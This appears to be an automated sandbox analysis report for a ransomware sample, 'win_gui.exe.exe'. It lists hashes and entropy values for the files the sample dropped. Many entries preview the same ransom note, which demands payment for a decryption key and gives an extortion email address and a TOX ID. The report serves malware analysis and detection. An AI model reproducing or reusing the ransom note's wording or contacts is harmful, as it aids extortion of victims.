                                Size (bytes):10455
                                Entropy (8bit):7.982915108395473
                                Encrypted:false
                                SSDEEP:192:rxisRCkp5GLvbWV1Ezkkct4rAhCbNTF9Etu6GdXmPJ62J7m+VONI:rIsY+avSV1j2TFCtZGFmPJ62J7m+VONI
                                MD5:80F25D316E9A95BA3701C9782236EEB4
                                SHA1:C81C4A7D7E6A519B1E4C905511760FBDE776DA6F
                                SHA-256:6F5872556CE61E000F9BB8EC71C76DF5C6784C66C0C2AE57FE518526822A2AAF
                                SHA-512:CCFA6E235F5DB3118F846AFF8B43789DF341169779D62D107D02C7E163B0CF34FDEA87A03BB213150F304D3A7A3AEC89AE60B4A874038C62D5B5D2B1A68B64B2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14809
                                Entropy (8bit):7.986744098306116
                                Encrypted:false
                                SSDEEP:384:kCFF5v3HBU0/uDmJwzQaJt54Fol66QHLDt1VVs+VOC:kCFF5PzuKKPUoyHLJ1sO
                                MD5:8B98BA815DD738A12544017AD147EB14
                                SHA1:7A2F323E40A83A3268AB5DD8D7B3FE1A80224E34
                                SHA-256:9D346B6B005DBA7B594663C97259BFF05188F4DADFBC10F10FEE99A3A503DF03
                                SHA-512:426054145A6CEFE344DCA0CB8A4A284CFA4F9CDA2829FD70B24996F6160A28795BF2E0683508F57597BE871B3C3DF54BDDDC2DAE05684C25D48F10B2265A5B13
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11994
                                Entropy (8bit):7.9799072458678255
                                Encrypted:false
                                SSDEEP:192:dFwAQqbwk/etldGi5Xh4aoxWV6tt/Lt3ivV80Gkpobg/whBk+VO6:dFdZbZevd55Xh4aoxrntP0Gkpobg/w6m
                                MD5:E457082AD226151F053F5AB3A34E6D2D
                                SHA1:BF150ABEB5501D8A7F0055B79FCD734A85AB9A70
                                SHA-256:41B8F87D6D90855A181E0475BBBB277CDB8CCDA3DD19B37388BA93D5DCDAD261
                                SHA-512:C31969218B21F3567A613726EB989C4104E7A37016E47540C3B334E7E7CB25E4C6CD2604D585230D27B90475A854D185387540C3F0FDA1A812D6D8AC4010CA67
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16370
                                Entropy (8bit):7.988757682318923
                                Encrypted:false
                                SSDEEP:384:ggT9I9v2aPH1KWOOambIvBBwjVfBKbGeOVDzoTKTEbcbf/sGr+VOK:ggE2aN0nmb2fwjPWGeOV4T8ccbf/sGre
                                MD5:B38C0373D4789B43BC156EFC2E956610
                                SHA1:6E2FD3FA38BC5EF5DBDF6933C66AD3EFAEA66B84
                                SHA-256:846B0EBC1CE0CD03323EFD9A6BE37FBDC8D2BE0E3E2FB7FD1AC0C856439F7F40
                                SHA-512:4E97C16E00DB0FEE0C5BBB097D87AA60B15E4A4A2B1AC7AFC36799502416A0B9A000D4ADE0A2A2229A05079BF00A32DE619DA69BF9993091F74F0A1DCF22BF53
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15775
                                Entropy (8bit):7.9880630047034495
                                Encrypted:false
                                SSDEEP:384:NAiILxnEJo4XpJs62/52EpX0RWYYGVhWEvWnj+VOq:NrILxY/DwVeRJhsje
                                MD5:6E227FDE0DB745347D398F6F1C77873F
                                SHA1:8AA940902A766572C53F3B3F3FE55E11295C5303
                                SHA-256:D8379AD1F1A3E94298F44686E3F54997A658158C16E689923BF8027B1D7FB652
                                SHA-512:E12EE49B49A059F2FC03FB924D5FAF9E026F2081906FC666F7A8202EBBD3EBDFFDE8F51D50B246285D627C142C3211685D0428E4FE491A7F0441D89A3CCDE19E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9991
                                Entropy (8bit):7.979563604320041
                                Encrypted:false
                                SSDEEP:192:ZiDGwe1QBX30JBz2yLgf70XwKU5jQk+PaTeJ3NnlSwTZSRFyo9g9U9J+VOH:Zou1wH8zHs70X5UlVoSiowTZS39PJ+VK
                                MD5:EF48C46F6DE1ACF38291DA7370E63125
                                SHA1:3990FE79FEE8FEE64A8A46037528809D536524C3
                                SHA-256:257E615EC36F3AFE577559A8467A441AF4291C7FF6FCBA2F84733BAB31D41374
                                SHA-512:A4B67A81AC4AED5C09D352A881979D0B5F34D577C8F6E1886CA37609BE8C5D3E51D9F7323EB113C928D9CCBC7EDF11867AA98422F810E1DD6530877B2CB6FD3E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7030
                                Entropy (8bit):7.970967234343353
                                Encrypted:false
                                SSDEEP:192:D3qG2iWOuRKM8OtIBIjhA8fxJrHJ5n4BE6AZ+VOg:LqGTqKM8mIS+Kx35n4Ef+VOg
                                MD5:7D7E7666A324BD694C91E52B77E9C8A4
                                SHA1:C5737F0DDEE3F3A98F5046C83B65A71FB958F6D6
                                SHA-256:1AF10A223AADF23A5E859BC34255322D282FA7779EF9D04C03FB24A440BF11AC
                                SHA-512:3195670F88A81011CB031EFB28257DD5ECE9360121288C1B4902802E9932E0B27B6D04961A1BDB7B35F07F75747A0370E7550E33376AF06EA331E441A9F5719B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9123
                                Entropy (8bit):7.984149649684124
                                Encrypted:false
                                SSDEEP:192:MqQ2vSpaQXZQqjIGDLhbDRDm7KDl+k6SnFpRfdiLUg0e2DSSW+VOG:MqeaQXZQqj5LVd67u6SfiLh+VOG
                                MD5:6C208034748530A6F72CF686E5E4121A
                                SHA1:EBA6EC264D2745AA6DDADFF1C757D496F194A9C6
                                SHA-256:AC8158BC767EFC35CC2D57DFF61A2B62B58E056EF21DE39551E258328CE0A655
                                SHA-512:72269ED619377537F53324A6F3F388F500A9B108023BA0C3B571D953B78848FC380482E7E14F09AE2804A7EAD073B9F4199C4ADC4496E135A4BB172CDF6B7EE0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11572
                                Entropy (8bit):7.985288889018853
                                Encrypted:false
                                SSDEEP:192:h+OpubDnRXxx0stxPqWsPhz36Gga7wqkM6GyLWzOtpDtftSmf8s+Ehnufk+VOf:QDntL0sbyW6z36GgmpkMVyQOt71r8UFR
                                MD5:D849C4E5EDB4CE298B7FF7BD21CDBEED
                                SHA1:F379523EA769C65110D760718C54EC902ADD5C35
                                SHA-256:187FB52A0781A8D01724FE8A1D8F4EAF8B45E6BC0F5935B9D4628CC7F359737C
                                SHA-512:FB53AB2D380FAE5E82168CADB941B16555FE749C565229C488261C3D2A467D5F2D8517E5E88B3C9E56C1B86B59C72092622B01D7E6936C84D906A1114BACF632
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8875
                                Entropy (8bit):7.9809073686937895
                                Encrypted:false
                                SSDEEP:192:IUpggjD3n4kjRjpVDsdbmwPXKxlS4TOMOgQoGpvHzrVuf1/Xvbb0Qk+VOj:Xpr9jRjpds5mjFOgfETr8f1Q+VOj
                                MD5:0E857BBB2AAA16B0A0BD503862A1C1A8
                                SHA1:3E10EAB8DA0DDB646DDAADA5EDD31ABBD8B017D6
                                SHA-256:0E8EDC28DD93AD469CB426193E0B68E68E0B80E490C32F99F9F1B3C30E915A9C
                                SHA-512:6085AEA18FD5142234FACB0EDCB508A2851DEC491E10624507FACF282A535F9FE034F8203E6F8E9C06472D7D487DA4FB6000094B383961E5FEFE2F68157545AC
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8962
                                Entropy (8bit):7.9778722295890825
                                Encrypted:false
                                SSDEEP:192:B4Jh3DTlEB9yQYqmGhA+UlO76+KJP33sGPPXi8u/P+VO/:YFDksjqmGhdf5KJvPq8uH+VO/
                                MD5:469F748620AACA06628BE3DFBF744487
                                SHA1:9EE206B1BA1BA204CB08B825071344A23B006AA8
                                SHA-256:088177889193D231B56E7E76B46A665F3F67EFFAD727340918551B02801C1907
                                SHA-512:176D5F46A608BF99532EE62375845B3E5EAA2219258DAA6B0241A12FCF4CC74DBA7F8C7D44C2258071DC2E64A189317B1B80C650CC153EFC4C2A92B4769C17F9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4598
                                Entropy (8bit):7.959436001702031
                                Encrypted:false
                                SSDEEP:96:M47Px0tx6hFSLifiPZEcFbY9Fig//mgWCxyEtLJTp9evuAVOvh:p7J0r6iLQiacwFjWCcEXP+VOvh
                                MD5:7ADECBFF1CB521ED03C69C2D8C6B375E
                                SHA1:8DCBCA775C4B9EF327459F655C59F798E280173C
                                SHA-256:A81311B293B49B6F32DBF65ED0C1D7AD00CCF65663A3E3A784B96907A6CAAA4E
                                SHA-512:C2A999EEDB1AA959414175898F4F8589454BE5387B1DEA5086BE5CFDFF58836728B10BC4669C46204B457C0A823DEA3BB69397942D12936F4E1E42630B01F24D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15456
                                Entropy (8bit):7.988455815318667
                                Encrypted:false
                                SSDEEP:384:AkGL9uFJsjcnbGqc8VKmxwb+Z2gFA4061Lw5Gj9+VOV:Aka9iJsjcnbAmJZ2im6pw5+J
                                MD5:DBDAB4B6C4576FDDD649B040817E9C30
                                SHA1:47F6C690BF84AE990D5E0EA93E735C380DAA8890
                                SHA-256:4F85EB205F3AD5F303BE0CBAD50C2C5B91C2146C2ABFECE711E56531C10ACBB1
                                SHA-512:151402DD1EE5C2F116C1C85AC28103770CB2BAF1DEAB9D1DF852C53FA42D6523722121C2B16E46DE1B358F90E05D78DCC924483E5BB66D12F4D6B7FA541E965A
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15456
                                Entropy (8bit):7.988455815318667
                                Encrypted:false
                                SSDEEP:384:AkGL9uFJsjcnbGqc8VKmxwb+Z2gFA4061Lw5Gj9+VOV:Aka9iJsjcnbAmJZ2im6pw5+J
                                MD5:DBDAB4B6C4576FDDD649B040817E9C30
                                SHA1:47F6C690BF84AE990D5E0EA93E735C380DAA8890
                                SHA-256:4F85EB205F3AD5F303BE0CBAD50C2C5B91C2146C2ABFECE711E56531C10ACBB1
                                SHA-512:151402DD1EE5C2F116C1C85AC28103770CB2BAF1DEAB9D1DF852C53FA42D6523722121C2B16E46DE1B358F90E05D78DCC924483E5BB66D12F4D6B7FA541E965A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):974
                                Entropy (8bit):7.770514457064826
                                Encrypted:false
                                SSDEEP:24:4lX1yfsVF26XbTcSUV04BIyz/wpDyYPGTNj0hOHAVMJg6WXs9Uudy:u+qjXbYB/f/WyYu+MAVMJg6Ta8y
                                MD5:AB0F0C74F141651A3ED6AC97C2F13608
                                SHA1:A130A015ADB3FEF76BEC748E14BF1CD4A84F3331
                                SHA-256:7D31949D7E3E1DF02E798C73590BA3275FE534FA704E08072C5E7B076953E626
                                SHA-512:987BE153C741794FD644B921F8BF3A5A5E95B3CE2B62C76F0ADFB1DA98A99E33D2E3E78CAE099ED66D0C98375109DC7FDF775F72676DABA8E8DF8880B66CD76A
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
